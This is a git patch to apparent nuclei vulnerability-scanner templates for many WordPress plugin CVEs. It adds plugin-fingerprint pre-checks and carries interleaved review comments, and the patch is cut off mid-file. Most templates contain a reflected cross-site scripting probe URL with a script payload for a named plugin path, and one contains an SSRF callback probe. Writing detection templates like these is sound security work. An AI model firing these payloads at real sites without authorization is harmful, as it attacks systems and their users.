00:00:00 2001 
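Review bot: Beyond the drupal-install path update named in the subject, this hunk removes ten workflow entries (xampp-default-page, default-iis7-page, default-windows-server-page, default-microsoft-azure-page, default-asp-net-page, default-nginx-page, default-lighttpd-page, default-django-page, ibm-http-server and default-detect-generic), so the workflow loses most of the detections its `description` still promises. If those templates were deleted or relocated elsewhere in the repository, the commit message should say so and name the replacement paths; if they still exist at their old paths, the removals look unintended. The `description: Detects default installations of web applications` line would also need wording that matches what is left.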
From: Ritik Chaddha Date: Tue, 26 Mar 2024 22:56:22 +0530 Subject: [PATCH 3/7] added flow --- http/cves/2016/CVE-2016-1000129.yaml | 13 +++++++++++++ http/cves/2016/CVE-2016-1000130.yaml | 16 ++++++++++++++++ http/cves/2016/CVE-2016-1000131.yaml | 16 ++++++++++++++++ http/cves/2016/CVE-2016-1000132.yaml | 13 +++++++++++++ http/cves/2016/CVE-2016-1000133.yaml | 13 +++++++++++++ http/cves/2016/CVE-2016-1000134.yaml | 13 +++++++++++++ http/cves/2016/CVE-2016-1000135.yaml | 13 +++++++++++++ http/cves/2016/CVE-2016-1000137.yaml | 13 +++++++++++++ http/cves/2016/CVE-2016-1000138.yaml | 12 ++++++++++++ http/cves/2016/CVE-2016-1000140.yaml | 13 +++++++++++++ http/cves/2016/CVE-2016-1000141.yaml | 13 +++++++++++++ http/cves/2016/CVE-2016-1000142.yaml | 15 +++++++++++++++ http/cves/2016/CVE-2016-1000143.yaml | 15 +++++++++++++++ http/cves/2016/CVE-2016-1000146.yaml | 12 ++++++++++++ http/cves/2016/CVE-2016-1000148.yaml | 13 +++++++++++++ http/cves/2016/CVE-2016-1000149.yaml | 15 +++++++++++++++ http/cves/2016/CVE-2016-1000152.yaml | 13 +++++++++++++ http/cves/2016/CVE-2016-1000153.yaml | 15 +++++++++++++++ http/cves/2016/CVE-2016-1000154.yaml | 15 +++++++++++++++ http/cves/2016/CVE-2016-1000155.yaml | 13 +++++++++++++ http/cves/2016/CVE-2016-10993.yaml | 16 +++++++++++++++- http/cves/2017/CVE-2017-17043.yaml | 12 ++++++++++++ http/cves/2017/CVE-2017-17059.yaml | 16 ++++++++++++++++ http/cves/2017/CVE-2017-17451.yaml | 13 +++++++++++++ http/cves/2017/CVE-2017-18598.yaml | 13 +++++++++++++ http/cves/2017/CVE-2017-9288.yaml | 15 +++++++++++++++ http/cves/2018/CVE-2018-20462.yaml | 15 +++++++++++++++ http/cves/2019/CVE-2019-14470.yaml | 13 +++++++++++++ http/cves/2019/CVE-2019-15713.yaml | 15 +++++++++++++++ http/cves/2019/CVE-2019-15889.yaml | 15 +++++++++++++++ http/cves/2019/CVE-2019-16332.yaml | 13 +++++++++++++ http/cves/2019/CVE-2019-16525.yaml | 15 +++++++++++++++ http/cves/2019/CVE-2019-16932.yaml | 17 ++++++++++++++++- http/cves/2020/CVE-2020-26153.yaml | 15 
+++++++++++++++ http/cves/2020/CVE-2020-29395.yaml | 13 +++++++++++++ http/cves/2020/CVE-2020-36510.yaml | 13 +++++++++++++ http/cves/2020/CVE-2020-7107.yaml | 15 +++++++++++++++ http/cves/2021/CVE-2021-24214.yaml | 13 +++++++++++++ http/cves/2021/CVE-2021-24239.yaml | 15 +++++++++++++++ http/cves/2021/CVE-2021-24245.yaml | 15 +++++++++++++++ http/cves/2021/CVE-2021-24298.yaml | 13 +++++++++++++ http/cves/2021/CVE-2021-24320.yaml | 16 ++++++++++++++++ http/cves/2021/CVE-2021-24335.yaml | 15 +++++++++++++++ http/cves/2021/CVE-2021-24342.yaml | 15 +++++++++++++++ http/cves/2021/CVE-2021-24364.yaml | 15 +++++++++++++++ http/cves/2021/CVE-2021-24387.yaml | 3 --- http/cves/2021/CVE-2021-24407.yaml | 17 +++++++++++++++-- http/cves/2021/CVE-2021-24495.yaml | 5 +++++ http/cves/2021/CVE-2021-24891.yaml | 13 +++++++++++++ http/cves/2022/CVE-2022-0381.yaml | 15 +++++++++++++++ http/cves/2022/CVE-2022-1724.yaml | 15 +++++++++++++++ http/cves/2022/CVE-2022-2383.yaml | 15 +++++++++++++++ http/cves/2022/CVE-2022-2462.yaml | 2 +- http/cves/2023/CVE-2023-0602.yaml | 2 +- .../wordpress/ldap-wp-login-xss.yaml | 2 +- .../wordpress/wordpress-wordfence-xss.yaml | 13 +++++++++++++ .../wordpress/wordpress-zebra-form-xss.yaml | 15 +++++++++++++++ .../wordpress/wp-ambience-xss.yaml | 12 ++++++++++++ .../wordpress/wp-custom-tables-xss.yaml | 15 +++++++++++++++ .../wordpress/wp-finder-xss.yaml | 13 +++++++++++++ .../wordpress/wp-flagem-xss.yaml | 13 +++++++++++++ .../vulnerabilities/wordpress/wp-knews-xss.yaml | 13 +++++++++++++ .../wordpress/wp-nextgen-xss.yaml | 13 +++++++++++++ .../wordpress/wp-phpfreechat-xss.yaml | 13 +++++++++++++ .../wordpress/wp-qwiz-online-xss.yaml | 2 +- .../wordpress/wp-securimage-xss.yaml | 15 +++++++++++++++ .../wordpress/wp-slideshow-xss.yaml | 15 +++++++++++++++ 67 files changed, 865 insertions(+), 11 deletions(-) diff --git a/http/cves/2016/CVE-2016-1000129.yaml b/http/cves/2016/CVE-2016-1000129.yaml index 2a8f576b92a..c6533cbe467 100644 
--- a/http/cves/2016/CVE-2016-1000129.yaml +++ b/http/cves/2016/CVE-2016-1000129.yaml @@ -31,7 +31,20 @@ info: google-query: inurl:"/wp-content/plugins/defa-online-image-protector" tags: cve2016,cve,wordpress,xss,wp-plugin,defa-online-image-protector_project +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/defa-online-image-protector/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Defa Online Image Protector' + - method: GET path: - "{{BaseURL}}/wp-content/plugins/defa-online-image-protector/redirect.php?r=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" diff --git a/http/cves/2016/CVE-2016-1000130.yaml b/http/cves/2016/CVE-2016-1000130.yaml index 0b82cdc5ae0..845777a3768 100644 --- a/http/cves/2016/CVE-2016-1000130.yaml +++ b/http/cves/2016/CVE-2016-1000130.yaml @@ -29,7 +29,23 @@ info: google-query: inurl:"/wp-content/plugins/e-search" tags: cve2016,cve,wordpress,xss,wp-plugin,e-search_project +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/e-search/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Search' + - 'Tags:' + - 'Tested up to:' + condition: and + - method: GET path: - "{{BaseURL}}/wp-content/plugins/e-search/tmpl/date_select.php?date-from=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" diff --git a/http/cves/2016/CVE-2016-1000131.yaml b/http/cves/2016/CVE-2016-1000131.yaml index dbf5a6f29ce..d435a94408e 100644 --- a/http/cves/2016/CVE-2016-1000131.yaml +++ b/http/cves/2016/CVE-2016-1000131.yaml 
@@ -30,7 +30,23 @@ info: google-query: inurl:"/wp-content/plugins/e-search" tags: cve2016,cve,wordpress,xss,wp-plugin,e-search_project +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/e-search/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Search' + - 'Tags:' + - 'Tested up to:' + condition: and + - method: GET path: - "{{BaseURL}}/wp-content/plugins/e-search/tmpl/title_az.php?title_az=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" diff --git a/http/cves/2016/CVE-2016-1000132.yaml b/http/cves/2016/CVE-2016-1000132.yaml index 8c37974d95d..030796f7fa8 100644 --- a/http/cves/2016/CVE-2016-1000132.yaml +++ b/http/cves/2016/CVE-2016-1000132.yaml @@ -31,7 +31,20 @@ info: google-query: inurl:"/wp-content/plugins/enhanced-tooltipglossary" tags: cve2016,cve,wordpress,xss,wp-plugin,cminds +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/enhanced-tooltipglossary/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'CM Tooltip Glossary' + - method: GET path: - "{{BaseURL}}/wp-content/plugins/enhanced-tooltipglossary/backend/views/admin_importexport.php?itemsnumber=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&msg=imported" diff --git a/http/cves/2016/CVE-2016-1000133.yaml b/http/cves/2016/CVE-2016-1000133.yaml index 8a4ca435c49..be645f8640d 100644 --- a/http/cves/2016/CVE-2016-1000133.yaml +++ b/http/cves/2016/CVE-2016-1000133.yaml 
@@ -30,7 +30,20 @@ info: google-query: inurl:"/wp-content/plugins/forget-about-shortcode-buttons" tags: cve2016,cve,wordpress,xss,wp-plugin,designsandcode +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/forget-about-shortcode-buttons/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Forget About Shortcode Buttons =' + - method: GET path: - "{{BaseURL}}/wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php?source=1&ver=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" diff --git a/http/cves/2016/CVE-2016-1000134.yaml b/http/cves/2016/CVE-2016-1000134.yaml index d7fa32d3c84..b2d50b37903 100644 --- a/http/cves/2016/CVE-2016-1000134.yaml +++ b/http/cves/2016/CVE-2016-1000134.yaml @@ -30,7 +30,20 @@ info: google-query: inurl:"/wp-content/plugins/hdw-tube" tags: cve2016,cve,wordpress,xss,wp-plugin,hdw-tube_project +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/hdw-tube/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'HDW WordPress Video Gallery' + - method: GET path: - "{{BaseURL}}/wp-content/plugins/hdw-tube/playlist.php?playlist=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" diff --git a/http/cves/2016/CVE-2016-1000135.yaml b/http/cves/2016/CVE-2016-1000135.yaml index a56972e594a..5316405f783 100644 --- a/http/cves/2016/CVE-2016-1000135.yaml +++ b/http/cves/2016/CVE-2016-1000135.yaml 
@@ -30,7 +30,20 @@ info: google-query: inurl:"/wp-content/plugins/hdw-tube" tags: cve2016,cve,wordpress,xss,wp-plugin,hdw-tube_project +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/hdw-tube/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'HDW WordPress Video Gallery' + - method: GET path: - "{{BaseURL}}/wp-content/plugins/hdw-tube/mychannel.php?channel=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" diff --git a/http/cves/2016/CVE-2016-1000137.yaml b/http/cves/2016/CVE-2016-1000137.yaml index eff4328c1bb..6c71027dbc6 100644 --- a/http/cves/2016/CVE-2016-1000137.yaml +++ b/http/cves/2016/CVE-2016-1000137.yaml @@ -30,7 +30,20 @@ info: framework: wordpress tags: cve2016,cve,wordpress,xss,wp-plugin,maps,hero-maps-pro_project +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/hero-maps-pro/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Hero Maps Pro =' + - method: GET path: - "{{BaseURL}}/wp-content/plugins/hero-maps-pro/views/dashboard/index.php?v=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" diff --git a/http/cves/2016/CVE-2016-1000138.yaml b/http/cves/2016/CVE-2016-1000138.yaml index 7a162c2fc62..a4980b959a6 100644 --- a/http/cves/2016/CVE-2016-1000138.yaml +++ b/http/cves/2016/CVE-2016-1000138.yaml @@ -30,7 +30,19 @@ info: google-query: inurl:"/wp-content/plugins/indexisto" tags: cve,cve2016,wordpress,xss,wp-plugin,indexisto_project +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/indexisto/readme.txt HTTP/1.1 + Host: {{Hostname}} + matchers: + - type: word + internal: true + words: + - '= Indexisto' + - method: GET path: - "{{BaseURL}}/wp-content/plugins/indexisto/assets/js/indexisto-inject.php?indexisto_index=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" 
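Review bot: The CVE-2016-1000138 pre-check is the only one in this batch that puts `matchers:` directly under `Host: {{Hostname}}` with no separating blank line; every sibling hunk (and the two hdw-tube and hero-maps-pro hunks on this same line) leaves one, and the `+30,19` count versus the usual `+30,20` reflects the missing line. This is style only, nuclei parses both forms, but the pre-check stanza is clearly being stamped out from one template, so keeping the same shape everywhere makes later bulk edits safer. Adding the blank line after `Host: {{Hostname}}` is the whole change.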
diff --git a/http/cves/2016/CVE-2016-1000140.yaml b/http/cves/2016/CVE-2016-1000140.yaml index 948c74273a5..3160d5cc977 100644 --- a/http/cves/2016/CVE-2016-1000140.yaml +++ b/http/cves/2016/CVE-2016-1000140.yaml @@ -30,7 +30,20 @@ info: framework: wordpress tags: cve2016,cve,wordpress,xss,wp-plugin,new-year-firework_project +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/new-year-firework/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'New Year Firework =' + - method: GET path: - "{{BaseURL}}/wp-content/plugins/new-year-firework/firework/index.php?text=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" diff --git a/http/cves/2016/CVE-2016-1000141.yaml b/http/cves/2016/CVE-2016-1000141.yaml index 25fe9f167aa..ddb8e7f587c 100644 --- a/http/cves/2016/CVE-2016-1000141.yaml +++ b/http/cves/2016/CVE-2016-1000141.yaml @@ -29,7 +29,20 @@ info: google-query: inurl:"/wp-content/plugins/page-layout-builder" tags: cve,cve2016,wordpress,xss,wp-plugin,page-layout-builder_project +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/page-layout-builder/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Page Layout Builder =' + - method: GET path: - "{{BaseURL}}/wp-content/plugins/page-layout-builder/includes/layout-settings.php?layout_settings_id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" diff --git a/http/cves/2016/CVE-2016-1000142.yaml b/http/cves/2016/CVE-2016-1000142.yaml index 93cf7c25239..8dac9e6d268 100644 --- a/http/cves/2016/CVE-2016-1000142.yaml +++ b/http/cves/2016/CVE-2016-1000142.yaml 
@@ -30,7 +30,22 @@ info: framework: wordpress tags: cve2016,cve,wordpress,wp-plugin,xss,wpscan,parsi-font_project +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/parsi-font/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'WP-Parsi Admin Font Editor' + - 'MW Font Changer' + condition: or + - method: GET path: - "{{BaseURL}}/wp-content/plugins/parsi-font/css.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" diff --git a/http/cves/2016/CVE-2016-1000143.yaml b/http/cves/2016/CVE-2016-1000143.yaml index b8238c16d42..e7558448781 100644 --- a/http/cves/2016/CVE-2016-1000143.yaml +++ b/http/cves/2016/CVE-2016-1000143.yaml @@ -30,7 +30,22 @@ info: framework: wordpress tags: cve2016,cve,wordpress,wp-plugin,xss,photoxhibit_project +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/photoxhibit/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'PhotoXhibit' + - 'Tags:' + condition: and + - method: GET path: - "{{BaseURL}}/wp-content/plugins/photoxhibit/common/inc/pages/build.php?gid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" diff --git a/http/cves/2016/CVE-2016-1000146.yaml b/http/cves/2016/CVE-2016-1000146.yaml index 682d38d9b64..fc14123db4c 100644 --- a/http/cves/2016/CVE-2016-1000146.yaml +++ b/http/cves/2016/CVE-2016-1000146.yaml @@ -28,7 +28,19 @@ info: framework: wordpress tags: cve2016,cve,wordpress,xss,wp-plugin,mail,pondol-formmail_project +flow: http(1) && http(2) + http: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: word + internal: true + words: + - '/wp-content/plugins/pondol-formmail/' + - method: GET path: - "{{BaseURL}}/wp-content/plugins/pondol-formmail/pages/admin-mail-info.php?itemid=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" 
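Review bot: The CVE-2016-1000146 pre-check fingerprints the plugin by looking for `/wp-content/plugins/pondol-formmail/` in the front page, which only works if the plugin enqueues an asset on that page; for a form plugin that is plausible but not guaranteed, and if it does not, `flow: http(1) && http(2)` silently short-circuits and the template never runs its second request (a false negative rather than the false positive this PR is fixing). The same homepage-only pattern is used for CVE-2017-17043 (emag-marketplace-connector), CVE-2017-18598 (qards), CVE-2019-14470 (userpro), CVE-2019-16332 (api-bearer-auth) and CVE-2020-29395 (eventON); at least the admin-side connector and the bearer-auth plugin are unlikely to emit front-page markup, though I cannot confirm that from the diff. The rest of the PR already uses the plugin's `readme.txt` as the fingerprint, which does not depend on what the theme renders; for these templates either switch to that, or probe both `'{{BaseURL}}'` and `'{{BaseURL}}/wp-content/plugins/<slug>/readme.txt'` with `stop-at-first-match: true` the way CVE-2021-24320 does.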
diff --git a/http/cves/2016/CVE-2016-1000148.yaml b/http/cves/2016/CVE-2016-1000148.yaml index 4645bea64a3..9196d0015c8 100644 --- a/http/cves/2016/CVE-2016-1000148.yaml +++ b/http/cves/2016/CVE-2016-1000148.yaml @@ -30,7 +30,20 @@ info: framework: wordpress tags: cve2016,cve,wordpress,wp-plugin,xss,wpscan,s3-video_project +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/s3-video/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'S3 Video Plugin =' + - method: GET path: - "{{BaseURL}}/wp-content/plugins/s3-video/views/video-management/preview_video.php?media=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C%22" diff --git a/http/cves/2016/CVE-2016-1000149.yaml b/http/cves/2016/CVE-2016-1000149.yaml index aa79851c168..f9e6ee52751 100644 --- a/http/cves/2016/CVE-2016-1000149.yaml +++ b/http/cves/2016/CVE-2016-1000149.yaml @@ -30,7 +30,22 @@ info: framework: wordpress tags: cve2016,cve,wordpress,xss,wp-plugin,simpel-reserveren_project +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/simpel-reserveren/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Simpel Reserveren' + - 'Tags:' + condition: and + - method: GET path: - "{{BaseURL}}/wp-content/plugins/simpel-reserveren/edit.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" diff --git a/http/cves/2016/CVE-2016-1000152.yaml b/http/cves/2016/CVE-2016-1000152.yaml index 18cdc95c771..71d2e2a0b0e 100644 --- a/http/cves/2016/CVE-2016-1000152.yaml +++ b/http/cves/2016/CVE-2016-1000152.yaml 
@@ -28,7 +28,20 @@ info: framework: wordpress tags: cve2016,cve,wordpress,xss,wp-plugin,tidio-form_project +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/tidio-form/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Easy Contact Form Builder =' + - method: GET path: - "{{BaseURL}}/wp-content/plugins/tidio-form/popup-insert-help.php?formId=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" diff --git a/http/cves/2016/CVE-2016-1000153.yaml b/http/cves/2016/CVE-2016-1000153.yaml index f503872328b..cc4db53cff6 100644 --- a/http/cves/2016/CVE-2016-1000153.yaml +++ b/http/cves/2016/CVE-2016-1000153.yaml @@ -30,7 +30,22 @@ info: framework: wordpress tags: cve2016,cve,wordpress,xss,wp-plugin,tidio-gallery_project +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/tidio-gallery/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Tidio Gallery' + - 'Tags:' + condition: and + - method: GET path: - "{{BaseURL}}/wp-content/plugins/tidio-gallery/popup-insert-help.php?galleryId=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" diff --git a/http/cves/2016/CVE-2016-1000154.yaml b/http/cves/2016/CVE-2016-1000154.yaml index 15dbf0ad572..1f8cdee6f55 100644 --- a/http/cves/2016/CVE-2016-1000154.yaml +++ b/http/cves/2016/CVE-2016-1000154.yaml @@ -29,7 +29,22 @@ info: framework: wordpress tags: cve2016,cve,wordpress,xss,wp-plugin,browserweb +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/whizz/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'WHIZZ' + - 'Tags:' + condition: and + - method: GET path: - "{{BaseURL}}/wp-content/plugins/whizz/plugins/delete-plugin.php?plugin=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" 
diff --git a/http/cves/2016/CVE-2016-1000155.yaml b/http/cves/2016/CVE-2016-1000155.yaml index 72f756ade00..16482ff2e4b 100644 --- a/http/cves/2016/CVE-2016-1000155.yaml +++ b/http/cves/2016/CVE-2016-1000155.yaml @@ -28,7 +28,20 @@ info: framework: wordpress tags: cve2016,cve,wordpress,xss,wp-plugin,wpsolr +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/wpsolr-search-engine/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'WPSOLR Search Engine =' + - method: GET path: - "{{BaseURL}}/wp-content/plugins/wpsolr-search-engine/classes/extensions/managed-solr-servers/templates/template-my-accounts.php?page=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" diff --git a/http/cves/2016/CVE-2016-10993.yaml b/http/cves/2016/CVE-2016-10993.yaml index 2afe54206ad..a52c4e1782a 100644 --- a/http/cves/2016/CVE-2016-10993.yaml +++ b/http/cves/2016/CVE-2016-10993.yaml 
@@ -4,7 +4,8 @@ info: name: ScoreMe Theme - Cross-Site Scripting author: daffainfo severity: medium - description: WordPress ScoreMe theme through 2016-04-01 contains a reflected cross-site scripting vulnerability via the s parameter which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + description: | + WordPress ScoreMe theme through 2016-04-01 contains a reflected cross-site scripting vulnerability via the s parameter which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | @@ -30,7 +31,20 @@ info: framework: wordpress tags: cve2016,cve,wordpress,wp-theme,xss,scoreme_project +flow: http(1) && http(2) + http: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - '/wp-content/themes/scoreme/style' + - method: GET path: - "{{BaseURL}}/?s=%22%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" diff --git a/http/cves/2017/CVE-2017-17043.yaml b/http/cves/2017/CVE-2017-17043.yaml index 2a20b7fcd1b..7354155c415 100644 --- a/http/cves/2017/CVE-2017-17043.yaml +++ b/http/cves/2017/CVE-2017-17043.yaml 
@@ -30,7 +30,19 @@ info: framework: wordpress tags: cve,cve2017,xss,wp-plugin,packetstorm,wordpress,zitec +flow: http(1) && http(2) + http: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: word + internal: true + words: + - '/wp-content/plugins/emag-marketplace-connector/' + - method: GET path: - "{{BaseURL}}/wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php?post=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" diff --git a/http/cves/2017/CVE-2017-17059.yaml b/http/cves/2017/CVE-2017-17059.yaml index 3bd36405ef7..8ae41e17000 100644 --- a/http/cves/2017/CVE-2017-17059.yaml +++ b/http/cves/2017/CVE-2017-17059.yaml @@ -28,7 +28,23 @@ info: framework: wordpress tags: cve2017,cve,xss,wp-plugin,packetstorm,wordpress,amtythumb_project +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/indexisto/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Amty Thumb' + - 'Tags:' + condition: and + case-insensitive: true + - method: POST path: - "{{BaseURL}}/wp-content/plugins/amty-thumb-recent-post/amtyThumbPostsAdminPg.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E=1" diff --git a/http/cves/2017/CVE-2017-17451.yaml b/http/cves/2017/CVE-2017-17451.yaml index 0d194271e33..8dc0b1a0b3c 100644 --- a/http/cves/2017/CVE-2017-17451.yaml +++ b/http/cves/2017/CVE-2017-17451.yaml @@ -30,7 +30,20 @@ info: framework: wordpress tags: cve,cve2017,wordpress,xss,wp-plugin,packetstorm,wpmailster +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/wp-mailster/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'WP Mailster =' + - method: GET path: - '{{BaseURL}}/wp-content/plugins/wp-mailster/view/subscription/unsubscribe2.php?mes=%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' 
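Review bot: In the CVE-2017-17059 hunk the pre-check requests `/wp-content/plugins/indexisto/readme.txt`, which is the Indexisto path copied from CVE-2016-1000138, while the template and its matcher words (`'Amty Thumb'`) are for the `amty-thumb-recent-post` plugin. The internal matcher can only pass on a host that happens to have Indexisto installed and whose Indexisto readme mentions Amty Thumb, so in practice the `flow` condition will fail and the POST to `amtyThumbPostsAdminPg.php` will never be sent. The request line should read `GET /wp-content/plugins/amty-thumb-recent-post/readme.txt HTTP/1.1`; the `case-insensitive: true` on the matcher is fine to keep.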
diff --git a/http/cves/2017/CVE-2017-18598.yaml b/http/cves/2017/CVE-2017-18598.yaml index 9e6304924ad..a8b32fb92cc 100644 --- a/http/cves/2017/CVE-2017-18598.yaml +++ b/http/cves/2017/CVE-2017-18598.yaml @@ -30,7 +30,20 @@ info: framework: wordpress tags: cve2017,cve,wp-plugin,oast,wpscan,wordpress,ssrf,xss,designmodo +flow: http(1) && http(2) + http: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - '/wp-content/plugins/qards/' + - method: GET path: - '{{BaseURL}}/wp-content/plugins/qards/html2canvasproxy.php?url=https://{{interactsh-url}}' diff --git a/http/cves/2017/CVE-2017-9288.yaml b/http/cves/2017/CVE-2017-9288.yaml index 3b22c0da553..80963a171b5 100644 --- a/http/cves/2017/CVE-2017-9288.yaml +++ b/http/cves/2017/CVE-2017-9288.yaml @@ -30,7 +30,22 @@ info: framework: wordpress tags: cve2017,cve,wordpress,xss,wp-plugin,raygun +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/raygun4wp/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Raygun4WP' + - 'Tags:' + condition: and + - method: GET path: - "{{BaseURL}}/wp-content/plugins/raygun4wp/sendtesterror.php?backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" diff --git a/http/cves/2018/CVE-2018-20462.yaml b/http/cves/2018/CVE-2018-20462.yaml index b9251f9f59e..bd2a66ed47f 100644 --- a/http/cves/2018/CVE-2018-20462.yaml +++ b/http/cves/2018/CVE-2018-20462.yaml 
@@ -30,7 +30,22 @@ info: framework: wordpress tags: cve2018,cve,wordpress,xss,wp-plugin,jsmol2wp_project +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/jsmol2wp/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'JSmol2WP' + - 'Tags:' + condition: and + - method: GET path: - '{{BaseURL}}/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=saveFile&data=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&mimetype=text/html;%20charset=utf-8' diff --git a/http/cves/2019/CVE-2019-14470.yaml b/http/cves/2019/CVE-2019-14470.yaml index 09eae3c7a58..5eb2843993c 100644 --- a/http/cves/2019/CVE-2019-14470.yaml +++ b/http/cves/2019/CVE-2019-14470.yaml @@ -29,7 +29,20 @@ info: product: instagram-php-api tags: cve,cve2019,wordpress,xss,wp-plugin,wpscan,packetstorm,instagram-php-api_project +flow: http(1) && http(2) + http: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - '/wp-content/plugins/userpro/' + - method: GET path: - '{{BaseURL}}/wp-content/plugins/userpro/lib/instagram/vendor/cosenary/instagram/example/success.php?error=&error_description=%3Csvg/onload=alert(1)%3E' diff --git a/http/cves/2019/CVE-2019-15713.yaml 